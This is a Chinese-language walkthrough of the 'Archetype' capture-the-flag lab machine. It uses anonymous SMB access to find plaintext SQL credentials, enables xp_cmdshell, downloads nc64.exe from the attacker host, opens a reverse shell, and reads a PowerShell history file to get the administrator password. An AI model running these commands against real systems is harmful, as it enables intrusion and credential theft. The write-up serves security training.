TIER 2: Archetype

扫描 nmap

使用 nmap 进行扫描目标 IP，发现目标是 Windows 服务器，开放 SMB 和 SQL Server 服务。

SMB

SMB 之前已经接触过，在 Windows 和 Linux 操作系统上连接 SMB 服务器的方法：

• windows 上使用：使用资源管理器、cmd 的 net、powershell 的 New-PSDrive 等。
• linux 上需要借助 smbclient 进行连接，smbclient 属于 samba 的一部分。

Microsoft 官方资料：

• 协议规范：https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb/
• Microsoft SMB 协议和 CIFS 协议：https://learn.microsoft.com/en-us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-overview
• Windows Server 如何使用 SMB 服务：https://learn.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview

我们在 kali 使用 smbclient 时，先使用 -N 和 -L 选项进行匿名登录和列出共享目录。提示使用 smbclient 不明白时，用 man smbclient 查看帮助文档。在 backups 下可以发现一个 prod.dtsConfig 配置文件，通过 get 可以下载这个文件。

使用 cat 查看文件，我们可以发现其中是明文存储账号密码凭证。主机 ARCHETYPE 用户 sql_svc 密码 M3g4c0rp123 凭证。

Microsoft SQL Server

Microsoft SQL Server 是由 Microsoft 开发和管理的关系型数据库管理系统（RDBMS）。SQL Server 使用 TCP/IP 协议进行网络通信，并使用默认的 1433 端口号。但是，端口号可以根据需要进行配置和更改。

通过上面在配置文件中发现的信息，我们通过 impacket 工具进行登录。

• 项目地址：https://github.com/fortra/impacket
• 建议使用 Python 创建虚拟环境安装 impacket
• 我们使用项目 impacket/examples/ 下的 mssqlclient.py 进行连接

使用 python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth 连接，注意 {TARGET_IP} 填写目标 IP 地址。

在登录 MSSQL 我们尝试攻击

SELECT is_srvrolemember('sysadmin'); -- 检查当前用户是否是 sysadmin

确认当前用户是 sysadmin 后，我们可以使用 xp_cmdshell 执行命令

-- 判断是否开启 xp_cmdshell
EXEC xp_cmdshell 'net user';

-- 如果没有，下面是激活 xp_cmdshell 的方法
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

确认激活后，通过 xp_cmdshell "whoami" 尝试。现在我们计划在目标上传 nc64.exe 二进制文件，并在监听端口上执行一个交互式的 cmd.exe 进程。

反弹 shell

我们先下载 nc64.exe 二进制文件：https://github.com/int0x33/nc.exe/blob/master/nc64.exe

注：如果使用 windows 下载可能会提示病毒

• 下载完成后，我们使用 python3 -m http.server 80 在本地启动一个 HTTP 服务
• 使用 xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.9/nc64.exe -outfile nc64.exe" 让目标下载 nc64.exe 文件
• kali 上使用 nc -lvnp 4444 监听 4444 端口
• 开始反弹 xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.9 4444" 让目标主动连接我们的监听端口

sql_svc 用户的 flag 在 C:\Users\sql_svc\Desktop\ 目录下。

提权

我们借助 winPEAS 工具进行提权，下载地址：https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/winPEASx64.exe

使用步骤相似，同样是使用 Python 的 HTTP 服务，让目标下载。让目标下载后直接 .\winPEASx64.exe 运行即可。

我们可以观察到用户具有 SeImpersonatePrivilege 特权，这也容易受到 Juicy Potato 漏洞利用的影响。然而，我们可以首先检查两个现有的文件，其中可能存在凭据。

由于这是一个普通用户账户和服务账户，值得检查频繁访问的文件或执行的命令。为了做到这一点，我们将读取 PowerShell 历史文件，这相当于 Linux 系统中的 .bash_history 文件。ConsoleHost_history.txt 可以在路径 C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ 目录下。通过分析 PowerShell 历史文件，攻击者可以查找之前执行过的命令、访问过的文件路径以及可能存在的敏感信息和凭据。他们可能会寻找密码、敏感命令、远程连接等活动，以获取对其他系统或账户的进一步访问权限。

最终我们在 ConsoleHost_history.txt 中可以发现管理员密码 MEGACORP_4dm1n!!，之后使用 psexec.py 连接 Administrator 用户即可。flag 在 C:\Users\Administrator\Desktop\ 目录下。